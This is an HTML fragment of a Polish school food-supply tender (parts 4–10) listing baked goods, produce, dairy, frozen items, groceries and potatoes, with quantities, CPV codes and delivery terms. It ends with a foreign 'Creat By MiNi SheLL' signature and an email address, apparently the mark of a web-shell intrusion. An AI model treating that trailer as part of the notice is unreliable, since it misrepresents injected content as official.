<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach



LP	Opis przedmiotu zamówienia	
ilość
1	Drożdżówki z budyniem  80g	2000
2	Pączki z marmoladą 70g	1000
3	Ciasto drożdżowe kg	160
4	Rożki z jabłkiem  70g	300
5	Drożdżówka z serem 80g	2000
6	Drożdżówka z owocami 80g	500
7	Makowiec 500g	100
8	Keks 500g	50
9	Sernik 500g	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Jabłka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach

1.	Przewidywana częstotliwość dostaw:  2 - 3 razy w tygodniu do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych, tworzonych na bieżąco, według potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z  obowiązującymi  normami



LP	Opis przedmiotu zamówienia	
ilość

1	Jabłka, kg
odmiany: Kortland,  Lobo,Champion, Alba, Ligol, Idaret, Ambas, Gloster,  i inne	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.23.21-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pozostałe owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach.

1.	Przewidywana częstotliwość dostaw:  :  codziennie od poniedziałku do piątku najpóźniej do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z obowiązującymi  normami.


LP	Opis przedmiotu zamówienia	
ilość
1	Banany	200kg
2	Buraki	300kg
3	Cebula	100kg
4	Gruszki	100kg
5	Kiwi	80 kg
6	Kapusta czerwona	100kg
7	Kapusta biała	100kg
8	Kapusta kiszona	260kg
9	Kapusta pekińska	100kg
10	Marchew	180kg
11	Mandarynki	100kg 
12	Natka pietruszki pęczki	160szt
13	Ogórki kiszone 0,9kg	100szt
14	Ogórek świeży	100kg
15	Pomidory	150kg
16	Pieczarki	160kg
17	Sałata lodowa 	140 szt
18	Pietruszka korzeń	70kg
19	Pomarańcze	150kg
20	Por	160szt
21	Seler  kg	90 kg
22	Sałata	150szt
23	Szczypiorek pęczki	30szt
24	Rzodkiewki pęczki 	50szt
25	Cytryny	50kg
26	Koperek świeży pęczki 	50szt
27	Nektarynki	20kg
28	Przecier ogórkowy 450g	60szt
29	Szczaw konserwowy 270g	20szt
30	Arbuz kg	170 kg
31	Brokuły świeże	100kg
32	Brzoskwinie	180kg
33	Kalafior świeży	100kg
35	Kapusta włoska	120kg
35	Papryka świeża 4 kolory	180kg
36	Czosnek główki	15 kg
37	Śliwki	180kg
38	Truskawki świeże	50kg
39	Cukinia 	50kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach

1.	Przewidywana częstotliwości dostaw:  codziennie od poniedziałku do piątku najpóźniej do godz. 6.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
Produkty winne być świeże,  zgodne z obowiązującymi normami



LP	Opis przedmiotu zamówienia	
ilość
1	Masło extra kostka zaw. tł.min.82% 200g	2000szt
2	Mleko spożywcze w folii 1l, 3,2% mleko pasteryzowane w wysokiej temperaturze	700 l
3	Śmietana 30% w folii 250ml, wartość energetyczna 100g 291 kcal	100 szt
4	Serek wiejski lekki granulowany 200g	250szt
5	Serek homogenizowany naturalny 150g	100szt
6	Kefir 200g	50szt
7	Śmietana 18%tłuszczu świeża bez dodatków i konserwantów 250g	150szt
8	Ser twardy żółty gouda	50kg
9	Ser twardy żółty salami	50kg
10	Ser biały twaróg półtłusty(200)g 3,50% tłuszczu	160kg
11	Mleko spożywcze  w folii 1l 2% pasteryzowane w wysokiej temperaturze	100 l
12	Jogurt naturalny 180g	80szt
13	 Maślanka naturalna 1 l	80szt
14	Ser sałatkowy feta 270g	80szt
15	Ser twardy żółty ementaller kg	50kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mrożone warzywa, owoce i potrawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach


1.	Przewidywana częstotliwość dostaw raz w tygodniu do godz. 8.30 rano;
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż ?  terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.



LP	Opis przedmiotu zamówienia	
ilość
1	Bukiet jarzyn z 9szt warzyw 450g	100szt
2	Fasolka szparagowa zielona mroż kg	80kg
3	Kalafior mrożony kg	100kg
4	Marchew mrożona kostka  kg	200kg
5	Marchew z groszkiem mroż. kg	150kg
6	Pyzy ziemniaczane mroż. z mięsem 2500g	100szt
7	Pyzy ziemniaczane mrożone 2500g	70szt
8	Truskawki mrożone całe owoce 2500g	50szt
9	Makrela wędzona	40kg
10	Filet z miruny, tilapii	200kg
11	Pierogi z kapustą i grzybami  2500g	50szt
12	Mieszanka kompotowa 2500g	50szt
13	Filet z dorsza bałtyckiego lub atlantyckiego	50kg
14	Brokuły róża 2500g	150szt
15	Uszka z mięsem 350g	100szt
16	Pierogi z serem 450g	150szt
17	Pierogi z owocami kg	100kg
18	Knedle z owocami 450g	100szt
19	Kluski śląskie 450g	150szt
20	Zupa jarzynowa mrożona kg	150kg
21	Barszcz ukraiński mrożony	80kg
22	Frytki ziemniaczane karbowane 2500g	60szt
23	Uszka z pieczarkami 450g	80szt
24	Filet z soli bez glazury, mrożony 	250kg
25	Filety śledziowe solone	60kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5, 15.22.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Różne artykuły żywnościowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach.


1.	Przewidywana częstotliwość dostaw 1 - 2  razy w tygodniu nie później niż  do godz. 8.30 rano
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na  bieżąco, według  potrzeb Zamawiającego.
4.	Produkty winne być świeże, w pierwszym gatunku,  zgodne z obowiązującymi normami.
5.	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż 3/4 terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.



LP	Opis przedmiotu zamówienia	
ilość
1	Ananasy w puszce plastry 565g	50szt
2	Budyń 64g bez cukru na ? l mleka	120szt
3	Brzoskwinie w puszce połówki w syropie 820g	60szt
4	Barszcz biały w proszku na naturalnym zakwasie z dodatkiem mąki pszennej bez glutaminianu sodu i innych ulepszaczy 80g	50szt
5	Chrzan  tarty delikatesowy ostry na kwasku cytrynowym pasteryzowany bez konserwantów innych dodatków op 290g	25szt
6	Dżem niskosłodzony różne smaki 280g,Sporządzony z 40g owoców na 100g produktu	240szt
7	Dżem słodzony sokiem bez cukru i substancji słodzących 280g	70szt
8	Przyprawa gyros 20g	30szt
9	Cukier biały kryształ kg	200kg
10	Fasola czerwona konserwowa z otwarciem 400g	80szt
11	Śliwka suszona 200g	15szt
12	Cukier wanilinowy 32g	80szt
13	Groszek konserwowy puszka z otwarciem 400g o zawartości masy netto 240g	80szt
14	Herbata wieloowocowa 80g	150szt
15	Fasola biała Jaś sucha 500g	100szt
16	Napar owocowy 100g	80szt
17	Groch łuskany połówki 400g	60szt
18	Herbata granulowana 80g	80szt
19	Herbata owocowa w sasz. 	80szt
20	Kakao 100 g wartość odżywcza w 100g produktu: wartość energetyczna 1276kj/307kcal, białko 204g, węglowodany 15,6g, tłuszcz 11g	80szt
21	Koncentrat pomidorowy 30-35% op.190g, bez sztucznych barwników i konserwantów, pasteryzowany	220szt
22	Ketchup 500g, (łagodny/pikantny),skład: 163g pomidorów na 100g produktu	115 szt
23	Kukurydza w puszce z otwarciem 400g	80szt
24	Kawa inka 150g	60szt
25	Kasza manna 1kg	28kg
26	Kasza gryczana  400g	65szt
27	Kasza jęczmienna średnia 500g	30szt
28	Makaron zacierka 250g	80szt
29	Kasza pęczak 400g	80szt
30	Mąka ziemniaczana 500g	10kg
31	Liść laurowy 10g	100szt
32	Mąka pszenna  kurpiowska 1kg	300kg
33	Przyprawa bazylia - liść suszony krojony 5g	10szt
34	Przyprawa curry 25g	10szt
35	Przyprawa do mięsa mielonego 20g	30szt
36	Przyprawa do ryb 20g	30szt
37	Ocet jabłkowy	40szt
38	Makaron bez ulepszaczy z mąki z pszenicy różne rodzaje -500g	300szt
39	Miód naturalny bez dodatków 380g	20szt
40	Majeranek 10g	100szt
41	Musztarda sarepska w opakowaniach szklanych bez konserwantów na produktach krajowych 170g	40szt
42	Przyprawa estragon 10g	5szt
43	Płatki kukurydziane 225g	40szt
44	Olej roślinny, rafinowany o zawartości kwasów jednonasyconych powyżej 50%i zawartości kwasów wielonienasyconych powyżej 40%opak. 1 l	170 l
45	Pieprz czarny mielony 15g	300szt
46	Pieprz ziarnisty 15g	200szt
47	Sól warzona, jodowana 1kg	130szt
48	Przyprawa gałka muszkatołowa mielona 15g	10szt
49	Przyprawa imbir mielony 50g	10szt
50	Ryba w pomidorach puszka z otwieraczem 170g	100szt
51	Orzechy laskowe 100g	2szt
52	Ziele angielskie w ziarnach 14g	80szt
53	Sezamki 27g	50szt
54	Przyprawa kminek 20g	10szt
55	Przyprawa oregano 10g	10szt
56	Paprykarz szczeciński 300g	80 szt
57	Czekolada z orzechami 100g	80szt
58	Przyprawa tymianek 10g	10szt
59	Przyprawa warzywna (zmielone warzywa i przyprawy bez konserwantów i glutaminianu sodu)opakowanie 500g	30szt
60	Orzechy włoskie łuskane 100g	10szt
61	Rodzynki sułtańskie 100g	15szt
62	Ryba w oleju (śledź) puszka 170 g z otwieraczem	50szt
63	Oliwki czarne 180g	10szt
64	Oliwki zielone 180g	10szt
65	Otręby pszenne 150g	30szt
66	Otręby żytnie 150g	30szt
67	Papryka mielona ostra 20g	40szt
68	Papryka mielona słodka 20g	50szt
69	Pieczywo chrupkie różne rodzaje 100g	60szt
70	Pieprz ziołowy 20g	50szt
71	Koperek suszony 20g	50sz
72	Płatki śniadaniowe różne rodzaje o zawartości mniejszej niż 10 gram soli, 10 gram cukru w 100g produktu	60szt
73	Płatki ryżowe 200g	80szt
74	Ryż biały długo ziarnisty 500g	100 kg
75	Ryż biały długo ziarnisty w torebkach 4 razy 100g	100szt 
76	Słonecznik łuskany 100g	10szt
77	Soki owocowo-warzywne, warzywne naturalne, bez dodatku cukru, konserwantów, przeciwutleniaczy, pasteryzowany opak. 330ml	100szt
78	Kwasek cytrynowy	20szt
79	Woda mineralna niegazowana  0,5 litra	300szt
80	Zioła prowansalskie 10g	10szt
81	Żurek na naturalnym zakwasie 500ml	20szt
82	Pestki dyni suszone 100g	10szt
83	Morele suszone 200g	10szt
84	Czekolada gorzka z orzechami	100szt
85	Sosy winegret 9g	50szt
86	Oliwa z oliwek 0,5l	50szt
87	Przyprawa cząber 20g	10szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wszystkie produkty muszą spełniać warunki zawarte w rozporządzeniu ministra zdrowia z dnia 26.08.2015 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach.


1.	Przewidywana częstotliwość dostaw:  raz w tygodniu do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z obowiązującymi normami.


LP	Opis przedmiotu zamówienia	
ilość
1	Ziemniaki	8000 kg
2	Ziemniaki młode - czerwiec	200 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com